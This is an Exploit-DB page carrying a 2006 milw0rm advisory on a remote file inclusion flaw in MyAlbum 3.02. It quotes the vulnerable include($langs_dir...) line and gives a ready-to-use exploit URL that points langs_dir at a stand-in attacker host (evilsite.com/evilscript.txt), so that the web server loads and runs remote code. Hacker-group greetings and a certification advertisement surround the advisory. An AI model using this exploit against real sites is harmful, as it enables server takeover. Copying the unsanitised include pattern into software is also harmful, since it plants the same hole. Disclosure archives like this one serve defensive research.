MyAlbum 3.02 - 'language.inc.php' Remote File Inclusion

EDB-ID:

2747




Platform:

PHP

Date:

2006-11-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#==============================================================================================
#MyAlbum <= 3.02 (langs_dir) Remote File Inclusion Vulnerability
#===============================================================================================
#
#Critical Level : hm...i think...
#
#Script Dowload : http://www.comscripts.com/jump.php?action=script&id=1731
#
#Version : 3.XX (maybe others...)
#
#================================================================================================
#
#Bug in :
#
#./language.inc.php
#================================================================================================
#
#Vulnerable Code :
#
#
#         include($langs_dir."/messages.".$lang.".php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[MyAlbum_DIR]/language.inc.php?langs_dir=http://evilsite.com/evilscript.txt?
#
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler The TURKISH DEVELOPER
#
#Contact : co-type[at]hotmail[dot]com
#
#GreetZ : |FATTALGAZI!| - |MADWORM| - |NARCOTIC| - |MR.TROJAN| - |TILKIANDRE| - |EDORAS| - | XVCX |
#
#AND ALL STARHACK USERZZ...
#
#Special Thanqs : str0ke - 0xyGen
#
#Reklam Kokan Hareket :d ===>>>>>>>>>>>>>>>>>> WWW.STARHACK.ORG <<<<<<<<<<<<<<<<<<=======
#
#==================================================================================================

# milw0rm.com [2006-11-09]